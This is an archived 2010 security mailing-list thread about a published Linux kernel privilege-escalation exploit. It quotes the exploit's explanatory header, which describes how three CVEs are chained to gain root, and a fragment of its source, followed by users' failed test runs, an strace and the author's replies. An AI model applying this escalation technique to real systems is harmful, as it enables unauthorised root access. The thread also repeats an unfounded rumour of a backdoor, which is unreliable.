>   ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, 
> sname);
>   else {
>   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>   if (ret == 2) {
>   char *p;
>   if (strstr(sname, "_O/") || strstr(sname, 
> "_S."))
>   continue;
>   p = strrchr(sname, '_');
>   if (p>  ((char *)sname + 5)&&  !strncmp(p - 3, 
> "smp", 3)) {
>   p = p - 4;
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread R0me0 ***

sp...@alucard ~ $ uname -a
Linux alucard 2.6.35-zen2-knight #1 ZEN SMP PREEMPT Wed Dec 1 12:34:54 BRST
2010 x86_64 Intel(R) Core(TM)2 Duo CPU T6400 @ 2.00GHz GenuineIntel
GNU/Linux
sp...@alucard ~ $ gcc -o nerso full-nelson.c
sp...@alucard ~ $ ./nerso
[*] Failed to open file descriptors.


2010/12/13 Francisco J 

> h...@darkstar:~$ cat /etc/slackware-version
> Slackware 13.1.0
> h...@darkstar:~$ uname -a
> Linux darkstar 2.6.33.4-smp #2 SMP Wed May 12 22:47:36 CDT 2010 i686
> Intel(R) Core(TM)2 CPU T5600  @ 1.83GHz GenuineIntel GNU/Linux
> h...@darkstar:~$ cc full-nelson.c -o full-nelson
> h...@darkstar:~$ ./full-nelson
> [*] Failed to open file descriptors.
>
>
> On 12/7/2010 6:25 PM, Dan Rosenberg wrote:
> > Hi all,
> >
> > I've included here a proof-of-concept local privilege escalation exploit
> > for Linux.  Please read the header for an explanation of what's going
> > on.  Without further ado, I present full-nelson.c:
> >
> > Happy hacking,
> > Dan
> >
> >
> > --snip--
> >
> > /*
> >   * Linux Kernel<= 2.6.37 local privilege escalation
> >   * by Dan Rosenberg
> >   * @djrbliss on twitter
> >   *
> >   * Usage:
> >   * gcc full-nelson.c -o full-nelson
> >   * ./full-nelson
> >   *
> >   * This exploit leverages three vulnerabilities to get root, all of
> which were
> >   * discovered by Nelson Elhage:
> >   *
> >   * CVE-2010-4258
> >   * -
> >   * This is the interesting one, and the reason I wrote this exploit.  If
> a
> >   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a
> NULL
> >   * word will be written to a user-specified pointer when that thread
> exits.
> >   * This write is done using put_user(), which ensures the provided
> destination
> >   * resides in valid userspace by invoking access_ok().  However, Nelson
> >   * discovered that when the kernel performs an address limit override
> via
> >   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page
> fault,
> >   * etc.), this override is not reverted before calling put_user() in the
> exit
> >   * path, allowing a user to write a NULL word to an arbitrary kernel
> address.
> >   * Note that this issue requires an additional vulnerability to trigger.
> >   *
> >   * CVE-2010-3849
> >   * -
> >   * This is a NULL pointer dereference in the Econet protocol.  By
> itself, it's
> >   * fairly benign as a local denial-of-service.  It's a perfect candidate
> to
> >   * trigger the above issue, since it's reachable via sock_no_sendpage(),
> which
> >   * subsequently calls sendmsg under KERNEL_DS.
> >   *
> >   * CVE-2010-3850
> >   * -
> >   * I wouldn't be able to reach the NULL pointer dereference and trigger
> the
> >   * OOPS if users weren't able to assign Econet addresses to arbitrary
> >   * interfaces due to a missing capabilities check.
> >   *
> >   * In the interest of public safety, this exploit was specifically
> designed to
> >   * be limited:
> >   *
> >   *  * The particular symbols I resolve are not exported on Slackware or
> Debian
> >   *  * Red Hat does not support Econet by default
> >   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu
> and
> >   *Debian
> >   *
> >   * However, the important issue, CVE-2010-4258, affects everyone, and it
> would
> >   * be trivial to find an unpatched DoS under KERNEL_DS and write a
> slightly
> >   * more sophisticated version of this that doesn't have the roadblocks I
> put in
> >   * to prevent abuse by script kiddies.
> >   *
> >   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
> >   *
> >   * NOTE: the exploit process will deadlock and stay in a zombie state
> after you
> >   * exit your root shell because the Econet thread OOPSes while holding
> the
> >   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't
> bother.
> >   *
> >   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
> >   */
> >
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> >
> > /* How many bytes should we clear in our
> >   * function pointer to put it into userspace? */
> > #ifdef __x86_64__
> > #define SHIFT 24
> > #define OFFSET 3
> > #else
> > #define SHIFT 8
> > #define OFFSET 1
> > #endif
> >
> > /* thanks spender... */
> > unsigned long get_kernel_sym(char *name)
> > {
> >   FILE *f;
> >   unsigned long addr;
> >   char dummy;
> >   char sname[512];
> >   struct utsname ver;
> >   int ret;
> >   int rep = 0;
> >   int oldstyle = 0;
> >
> >   f = fopen("/proc/kallsyms", "r");
> >   if (f == NULL) {
> >   f = fopen("/proc/ksyms", "r");
> >   if (f == NULL)
> >   goto fallback;
> >   oldstyle = 1;
> >   }
> >
> > repeat:
> >   ret = 0;
> >   while(ret != EOF) {
> >   if (!oldstyle)
> >   ret = fscanf(f, "%p

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji

I heard rumors it's backdoored and sends your /etc/passwd and uname to Dan
Rosenberg.

Just sayin'

On Mon, Dec 13, 2010 at 3:27 PM,  wrote:

> I tested it on a VM with CentOS 5.5 i386 updated and did not work.
>
> Last login: Tue Dec 13 12:48:54 2010
> [r...@localhost~]#nano full-nelson.c
> [r...@localhost~]#gcc-o full-nelson.c full-nelson
> [r...@localhost~]#./full-nelson
> [*] Failed to open file descriptors.
> [r...@localhost~]# uname-a
> Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40
> EST 2010 i686 i686 i386 GNU/Linux
> [r...@localhost~]#
>
> My 10 cents:)
>
> @firebitsbr
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread firebits

I tested it on a VM with CentOS 5.5 i386 updated and did not work.

Last login: Tue Dec 13 12:48:54 2010
[r...@localhost~]#nano full-nelson.c
[r...@localhost~]#gcc-o full-nelson.c full-nelson
[r...@localhost~]#./full-nelson
[*] Failed to open file descriptors.
[r...@localhost~]# uname-a
Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40 EST 
2010 i686 i686 i386 GNU/Linux
[r...@localhost~]#

My 10 cents:)

@firebitsbr

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux Kernel Exploit

2010-12-13 Thread highteck

On 13/12/2010 12:03 PM, highteck wrote:
> r...@bt:~# su test
> sh-3.2$ cd /tmp
> sh-3.2$ id;uname -a
> uid=1000(test) gid=1000(test) groups=1000(test)
> Linux bt 2.6.34 #1 SMP Wed Jul 21 09:51:09 EDT 2010 i686 GNU/Linux
> sh-3.2$ ls
> full-nelson.c
> sh-3.2$ gcc full-nelson.c -o full-nelson
> sh-3.2$ ./full-nelson
> [*] Failed to open file descriptors.
> sh-3.2$
>
>
> (3:841)$ uname -a;id
> Linux lemon 2.6.32.25-grsec-c0re #1 SMP Sat Nov 20 15:12:27 EST 2010 
> i686 GNU/Linux
> uid=1000(test) gid=1000(test) 
> groups=1000(test,20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)
> (3:842)$ gcc full-nelson.c -o full-nelson
> (3:843)$ ./full-nelson
> [*] Failed to open file descriptors.
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux Kernel Exploit

2010-12-13 Thread highteck

On 13/12/2010 12:05 PM, highteck wrote:
> Posted by Benji on Dec 13
>
> I heard rumors it's backdoored and sends your /etc/passwd and uname to 
> Dan
> Rosenberg.
>
> Just sayin'
>
>
> ^^^
>
> 1. wheres the shell code to hide such a process?
> 2. do you see /etc/passwd any ware in there?
> 3. dan rosenberg is a respected person in the community and i highly 
> doubt he would do  that.
>
>
> read teh code man.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Ariel Biener

But he said that RedHat (and thus CentOS) doesn't have Econet enabled by
default.

--Ariel

fireb...@backtrack.com.br wrote:
> I tested it on a VM with CentOS 5.5 i386 updated and did not work.
>
> Last login: Tue Dec 13 12:48:54 2010
> [r...@localhost~]#nano full-nelson.c
> [r...@localhost~]#gcc-o full-nelson.c full-nelson
> [r...@localhost~]#./full-nelson
> [*] Failed to open file descriptors.
> [r...@localhost~]# uname-a
> Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40 
> EST 2010 i686 i686 i386 GNU/Linux
> [r...@localhost~]#
>
> My 10 cents:)
>
> @firebitsbr
>
>   

-- 
 --
 Ariel Biener
 e-mail: ar...@post.tau.ac.il
 PGP: http://www.tau.ac.il/~ariel/pgp.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]

I've seen far too many people just sending back "Failed to open file
descriptors" without giving any indication as to what could have happened.
:| Can people *please* remember to send the author as much debug as possible
(at the very least, an strace), so they can at least see what's going on.
Can people also use uname -a, rather than just -r, so it indicates what arch
is being used.


Anyways, the code failed on our sandbox.. see below:

 f...@sandbox01.simplicitymedialtd.co.uk [~] > gcc test.c -o full-nelson

 f...@sandbox01.simplicitymedialtd.co.uk [~] > ./full-nelson
[*] Failed to open file descriptors.

 f...@sandbox01.simplicitymedialtd.co.uk [~] > uname -a
Linux sandbox01.simplicitymedialtd.co.uk 2.6.32.25-grsec #1 SMP Wed Nov 24
02:26:04 GMT 2010 x86_64 GNU/Linux

 f...@sandbox01.simplicitymedialtd.co.uk [~] > cat /etc/issue
Debian GNU/Linux 5.0 \n \l

 f...@courtney.simplicitymedialtd.co.uk [~] > strace ./full-nelson
execve("./full-nelson", ["./full-nelson"], [/* 17 vars */]) = 0
brk(0)  = 0x601a98
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7f016b504000
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7f016b502000
access("/etc/ld.so.preload", R_OK)  = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)  = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=15513, ...}) = 0
mmap(NULL, 15513, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f016b4fe000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/lib/libc.so.6", O_RDONLY)= 3
read(3, 
"\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\300\342\1\0\0\0\0\0@"...,
832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1375536, ...}) = 0
mmap(NULL, 3482232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) =
0x7f016af98000
mprotect(0x7f016b0e2000, 2093056, PROT_NONE) = 0
mmap(0x7f016b2e1000, 20480, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149000) = 0x7f016b2e1000
mmap(0x7f016b2e6000, 17016, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f016b2e6000
close(3)= 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7f016b4fd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7f016b4fc000
arch_prctl(ARCH_SET_FS, 0x7f016b4fc6e0) = 0
mprotect(0x7f016b2e1000, 12288, PROT_READ) = 0
munmap(0x7f016b4fe000, 15513)   = 0
pipe([3, 4])= 0
socket(PF_ECONET, SOCK_DGRAM, 0)= -1 EAFNOSUPPORT (Address family
not supported by protocol)
open("/dev/zero", O_RDONLY) = 5
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 11), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x7f016b501000
write(1, "[*] Failed to open file descripto"..., 37[*] Failed to open file
descriptors.
) = 37
exit_group(-1)  = ?



On Mon, Dec 13, 2010 at 6:12 PM, Ariel Biener  wrote:

> But he said that RedHat (and thus CentOS) doesn't have Econet enabled by
> default.
>
> --Ariel
>
> fireb...@backtrack.com.br wrote:
> > I tested it on a VM with CentOS 5.5 i386 updated and did not work.
> >
> > Last login: Tue Dec 13 12:48:54 2010
> > [r...@localhost~]#nano full-nelson.c
> > [r...@localhost~]#gcc-o full-nelson.c full-nelson
> > [r...@localhost~]#./full-nelson
> > [*] Failed to open file descriptors.
> > [r...@localhost~]# uname-a
> > Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9
> 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
> > [r...@localhost~]#
> >
> > My 10 cents:)
> >
> > @firebitsbr
> >
> >
>
> --
>  --
>  Ariel Biener
>  e-mail: ar...@post.tau.ac.il
>  PGP: http://www.tau.ac.il/~ariel/pgp.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread coderman

On Mon, Dec 13, 2010 at 12:40 PM, Cal Leeming [Simplicity Media Ltd]
 wrote:
> I've seen far too many people just sending back "Failed to open file
> descriptors" without giving any indication as to what could have happened.
> ...
> Anyways, the code failed on our sandbox.. see below:
> ...
> socket(PF_ECONET, SOCK_DGRAM, 0)
>   = -1 EAFNOSUPPORT (Address family not supported by protocol)

that's the relevant part for you.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread dan . j . rosenberg

Please don't inundate me with e-mail because none of you bothered to read the 
exploit header.

The exploit so far has a 100% success rate on the systems it was designed to 
work on.

I don't think this is rocket science.  If your distribution does not compile 
Econet, then the exploit obviously won't be able to open an Econet socket.  
This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS, Slackware, and more. 
 This doesn't mean you're not vulnerable, it just means this particular exploit 
won't work.

If your distro doesn't export the relevant symbols (Debian), ditto above.

If your distro has patched the Econet vulnerabilities I used to trigger this 
(Ubuntu), ditto above.

This was done on purpose, to avoid giving a weaponized exploit to people who 
shouldn't have one.

-Dan


Sent from my Verizon Wireless BlackBerry

-Original Message-
From: "Cal Leeming [Simplicity Media Ltd]"

Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 13 Dec 2010 20:40:45 
To: Ariel Biener
Cc: ; ; 
; 
Subject: Re: [Full-disclosure] Linux kernel exploit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]

Sorry Dan, I did a very quick copy and paste job, without reading the
headers. I simply don't have time to read the code notes of every single
exploit released.

I would say that, if you are fed up with being inundated with emails, then
perhaps you should mark these notes very clearly in big red writing at the
top of the email like this, for those people who don't have much time to
read these notes ;)

On Mon, Dec 13, 2010 at 9:08 PM,  wrote:

> Please don't inundate me with e-mail because none of you bothered to read
> the exploit header.
>
> The exploit so far has a 100% success rate on the systems it was designed
> to work on.
>
> I don't think this is rocket science.  If your distribution does not
> compile Econet, then the exploit obviously won't be able to open an Econet
> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
> this particular exploit won't work.
>
> If your distro doesn't export the relevant symbols (Debian), ditto above.
>
> If your distro has patched the Econet vulnerabilities I used to trigger
> this (Ubuntu), ditto above.
>
> This was done on purpose, to avoid giving a weaponized exploit to people
> who shouldn't have one.
>
> -Dan
>
>
> Sent from my Verizon Wireless BlackBerry
>
> -Original Message-
> From: "Cal Leeming [Simplicity Media Ltd]"
>
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Mon, 13 Dec 2010 20:40:45
> To: Ariel Biener
> Cc: ; ; <
> bugt...@securityfocus.com>; 
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]

   1. It ran on a one-time server which gets re-generated every time its
   restarted (which is everytime a testing session has finished)
   2. I did a *very* brief look in the code for shell code etc, and based on
   the noise already on the board, there wasn't any risk.
   3. Even if there was dodgy shell code in there, it still would have posed
   no risk, because the sandbox is re-generated every time (see comment 1)

No more troll feed for you!

On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:

> wait wait wait.
>
> you dont have time to read header notes, but do have time to run code you
> dont really know what it does on your system?
>
> can I send you some code? it's a linux 2.6.* 0day, remote root.
>
>
> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Sorry Dan, I did a very quick copy and paste job, without reading the
>> headers. I simply don't have time to read the code notes of every single
>> exploit released.
>>
>> I would say that, if you are fed up with being inundated with emails, then
>> perhaps you should mark these notes very clearly in big red writing at
>> the top of the email like this, for those people who don't have much time
>> to read these notes ;)
>>
>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>
>>> Please don't inundate me with e-mail because none of you bothered to read
>>> the exploit header.
>>>
>>> The exploit so far has a 100% success rate on the systems it was designed
>>> to work on.
>>>
>>> I don't think this is rocket science.  If your distribution does not
>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>>> this particular exploit won't work.
>>>
>>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>>
>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>> this (Ubuntu), ditto above.
>>>
>>> This was done on purpose, to avoid giving a weaponized exploit to people
>>> who shouldn't have one.
>>>
>>> -Dan
>>>
>>>
>>> Sent from my Verizon Wireless BlackBerry
>>>
>>> -Original Message-
>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>
>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>> Date: Mon, 13 Dec 2010 20:40:45
>>> To: Ariel Biener
>>> Cc: ; ; <
>>> bugt...@securityfocus.com>; 
>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>>
>> Cal Leeming
>>
>> Operational Security & Support Team
>>
>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>> supp...@simplicitymedialtd.co.uk
>> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
>>
>> *IM: *AIM / ICQ / MSN / Skype (available upon request)
>> Simplicity Media Ltd. All rights reserved.
>> Registered company number 7143564
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>


-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji

I know in your perfect world nothing could ever break out of a sandbox, but
this just isnt true.

No more coco-pops for you, maybe some brain food!

On Mon, Dec 13, 2010 at 9:19 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

>
>1. It ran on a one-time server which gets re-generated every time its
>restarted (which is everytime a testing session has finished)
>2. I did a *very* brief look in the code for shell code etc, and based
>on the noise already on the board, there wasn't any risk.
>3. Even if there was dodgy shell code in there, it still would have
>posed no risk, because the sandbox is re-generated every time (see comment
>1)
>
> No more troll feed for you!
>
> On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:
>
>> wait wait wait.
>>
>> you dont have time to read header notes, but do have time to run code you
>> dont really know what it does on your system?
>>
>> can I send you some code? it's a linux 2.6.* 0day, remote root.
>>
>>
>> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>
>>> Sorry Dan, I did a very quick copy and paste job, without reading the
>>> headers. I simply don't have time to read the code notes of every single
>>> exploit released.
>>>
>>> I would say that, if you are fed up with being inundated with emails,
>>> then perhaps you should mark these notes very clearly in big red writing
>>> at the top of the email like this, for those people who don't have much
>>> time to read these notes ;)
>>>
>>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>>
>>>> Please don't inundate me with e-mail because none of you bothered to
>>>> read the exploit header.
>>>>
>>>> The exploit so far has a 100% success rate on the systems it was
>>>> designed to work on.
>>>>
>>>> I don't think this is rocket science.  If your distribution does not
>>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just 
>>>> means
>>>> this particular exploit won't work.
>>>>
>>>> If your distro doesn't export the relevant symbols (Debian), ditto
>>>> above.
>>>>
>>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>>> this (Ubuntu), ditto above.
>>>>
>>>> This was done on purpose, to avoid giving a weaponized exploit to people
>>>> who shouldn't have one.
>>>>
>>>> -Dan
>>>>
>>>>
>>>> Sent from my Verizon Wireless BlackBerry
>>>>
>>>> -Original Message-
>>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>>
>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>> Date: Mon, 13 Dec 2010 20:40:45
>>>> To: Ariel Biener
>>>> Cc: ; ; <
>>>> bugt...@securityfocus.com>; 
>>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>> --
>>>
>>> Cal Leeming
>>>
>>> Operational Security & Support Team
>>>
>>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>>> supp...@simplicitymedialtd.co.uk
>>> *Fax: *+44 (02476) 578987 | *Email: *
>>> cal.leem...@simplicitymedialtd.co.uk
>>> *IM: *AIM / ICQ / MSN / Skype (available upon request)
>>> Simplicity Media Ltd. All rights reserved.
>>> Registered company number 7143564
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji

wait wait wait.

you dont have time to read header notes, but do have time to run code you
dont really know what it does on your system?

can I send you some code? it's a linux 2.6.* 0day, remote root.

On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Sorry Dan, I did a very quick copy and paste job, without reading the
> headers. I simply don't have time to read the code notes of every single
> exploit released.
>
> I would say that, if you are fed up with being inundated with emails, then
> perhaps you should mark these notes very clearly in big red writing at the
> top of the email like this, for those people who don't have much time to
> read these notes ;)
>
> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>
>> Please don't inundate me with e-mail because none of you bothered to read
>> the exploit header.
>>
>> The exploit so far has a 100% success rate on the systems it was designed
>> to work on.
>>
>> I don't think this is rocket science.  If your distribution does not
>> compile Econet, then the exploit obviously won't be able to open an Econet
>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>> this particular exploit won't work.
>>
>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>
>> If your distro has patched the Econet vulnerabilities I used to trigger
>> this (Ubuntu), ditto above.
>>
>> This was done on purpose, to avoid giving a weaponized exploit to people
>> who shouldn't have one.
>>
>> -Dan
>>
>>
>> Sent from my Verizon Wireless BlackBerry
>>
>> -----Original Message-
>> From: "Cal Leeming [Simplicity Media Ltd]"
>>
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> Date: Mon, 13 Dec 2010 20:40:45
>> To: Ariel Biener
>> Cc: ; ; <
>> bugt...@securityfocus.com>; 
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Eyeballing Weev

Admitting you will not feed the trolls show that you have fed the trolls 
at some point in time and have fell for a troll.

There is no way to properly "damage control" this statement.

YHBT YHL HAND

On 12/13/2010 04:19 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> No more troll feed for you!
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]

Actually Ryan, I'll think you'll find a lot of people just wanted to
contribute towards testing, as most authors will appreciate the masses
testing on as many systems as possible.

It's not a case of anyone "showing off", it's simply that a lot of people
simply don't have time to read the "small print".

On Mon, Dec 13, 2010 at 9:27 PM, Ryan Sears  wrote:

> Hey Dan,
>
> Freaking THANK YOU first and foremost. I've been waiting for someone to say
> that for days now, and was just about to myself.
>
> Just because everyone and their brother want's to show off that they can
> compile & run some software (herp a derp, good job) DOESN'T mean they should
> immediately post it here. I tested it against an OLDER KERNEL on purpose
> because I actually read the headers and the exploit worked as expected. I
> knew that this was responsibly disclosed, so it was already patched on any
> system that I updated. If you don't have the proper symbols, then the
> exploit doesn't have the proper offsets, and the exploit will fail. Plain
